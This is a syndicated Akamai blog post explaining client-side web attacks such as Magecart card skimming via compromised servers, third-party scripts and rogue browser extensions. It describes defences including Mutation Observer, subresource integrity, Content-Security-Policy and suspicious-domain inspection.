Have you ever browsed a website with complete confidence that your data is protected? We tend to trust websites with some of our most valuable assets, such as personal information or credit card data. While owners of these websites might consider the protection of our data a top priority, we still keep hearing about information leaks and data breaches. Situations like this are why more and more website owners come to us for client side solutions.
In this blog post, we will explore a couple of client side threats, how they can affect website owners, as well as ways to mitigate them.
What are client side threats?
While the term “client side” has different meanings, in this post, we’re using the term to represent the web browser.
Most client side attacks are a consequence of a more sophisticated attack chain that eventually affects the visitors of the website.
Recent client side attacks, like Magecart, targeted few of the biggest websites on the Internet such as British Airways, NewEgg, and Ticketmaster. Each attack had one single goal as the endgame – your personal financial and identifying information.
Those attacks are considered client side threats because, while the main entry point might be the webserver, your data is the attacker’s ultimate goal. While such attacks keep happening, they can be quickly mitigated by understanding the client side realm. Let’s take a closer look at a few of the most common attack scenarios we have observed at Akamai.
Common Attack Scenarios
Each and every client side attack is different, but they all rely on the fact that the attackers have to gain some sort of access to the website visitor’s browser. In order to do that, some attackers might rely on hacking the server and changing front end code, while others may infect third-parties (i.e., supply chain attacks).
In our first scenario, let’s consider a server application (e.g. example.com) that has been compromised. We’ll skip over the details as to how the application was compromised, and start once the attacker has a foothold on the server. Once the application has been compromised, the attacker can now inject malicious code as first party content to the web page, in the form of inline scripts (or reference to another remote/local resource):
Infected 3rd Party
The second scenario deals with the same web page as before, only now the server hasn’t been compromised. The problem here is that the website depends on a third-party resource (like jQuery, bootstrap etc). This sort of dependency creates a one-way trust, where the website trusts the content of the third-party’s content blindly.
In the scenario where the third-party server is breached, an attacker can modify the content of the allegedly legit code with malicious code, thereby exposing the original webpage to malicious code:
The final scenario deals with the situation where neither the website nor its third-party dependencies are hacked, but the browser itself is. Browser extensions can be very useful. They can manage our passwords and personal information, block advertisements, and more. However, browser extensions come with risk, and there have been cases were official extension repositories contained malicious code.
This scenario deals with a rogue browser extensions that now live in our browser:
What all the attacks have in common is that the injected code, which now runs on the victims browser, has to exfiltrate some data (sensitive information, like credit cards, CVV etc.) to the attacker’s servers in order to benefit from the attack. The attack cannot gain much from just simply living in your browser. But how can we detect and mitigate those attacks?
Detection & Mitigation Methods
Over time, web browsers have become more capable and robust. For example, performing asynchronous tasks in the browser was considered a dream in the early days of the Internet. Now it is possible to harness some of those modern API’s to help protect the client from such threats.
Observing Website Mutations
One approach to protecting visitors is by using the Mutation Observer API. This modern web API gives us the ability to watch for changes being made to the web page. The website owner can create a list of allowed mutations that the website is already doing, resulting in every disallowed mutation being blocked. Such blocked mutations can be adding a script tag or an image (which is a common exfiltration technique). An implementation of this idea already exists in a project called `DOMTEGRITY`.
Another instrument is called subresource integrity (SRI). This feature enables browsers to verify that the resources they fetch (from third-parties or first-party) are delivered without unexpected manipulation. The way this works is by providing a cryptographic hash to the resource that we can calculate a priori. This way, when the client first renders the page, and before loading the fetched resource, it will validate its content by comparing the provided hash with the calculated one.
One major web feature that is gaining traction along the years is content security policy (CSP). With CSP, a website owner can define a content security policy to allow or disallow certain resource types to be fetched from different origins. The policy itself is transmitted to the client via a special header called “Content-Security-Policy”.
CSP works by defining a list of source types, like images, connections, frames, etc (which are also called directives) and origins from which we can load that resource from. With these directives well defined, we can control from where we allow to load sources in our websites. Another useful purpose for CSP is that it can also be used to block exfiltration requests made by the attack on the browser.
In recent Magecart campaigns targeting Forbes magazine, the attackers took a rather unique approach to exfiltrate the data. Instead of common methods, they used Web Sockets. CSP policy could block that web sockets connection using the “connect-src” directive.
Domain Name Inspection
While the following method is not a web API, I thought it would be interesting to mention. The attacker has to decide where to send the exfiltrated data within the victims browser. He can either choose to send it to an IP address – which looks extremely suspicious, or use a domain name.
There are a couple of methods to decide whether a domain name looks suspicious. First, we can rely on domain blacklist feeds, which mainly include domains involved in malicious activity. Second, we can look at domains that resemble the website domain name itself.
One good example of that was the attack on NewEgg, the exfiltration domain name was “neweggstats[.]com” which as you can easily observer resembles the website itself “newegg.com”.
Client side threats are on the rise, as we keep seeing large websites or one of their dependencies getting compromised. While those threats usually aim at the website’s visitors, it is evident that the website owners get indirectly hurt as well.
Even if the website itself wasn’t hacked, eventually the website visitors will be impacted. Such situations could lead to financial or reputational harm to the website owner. By implementing at least some of the methods above it is possible to detect and mitigate those attacks before they hit your business critically.
*** This is a Security Bloggers Network syndicated blog from The Akamai Blog authored by Daniel Abeles. Read the original post at: http://feedproxy.google.com/~r/TheAkamaiBlog/~3/OajfdiY8RyI/client-side-threats-how-could-website-owners-mitigate-them.html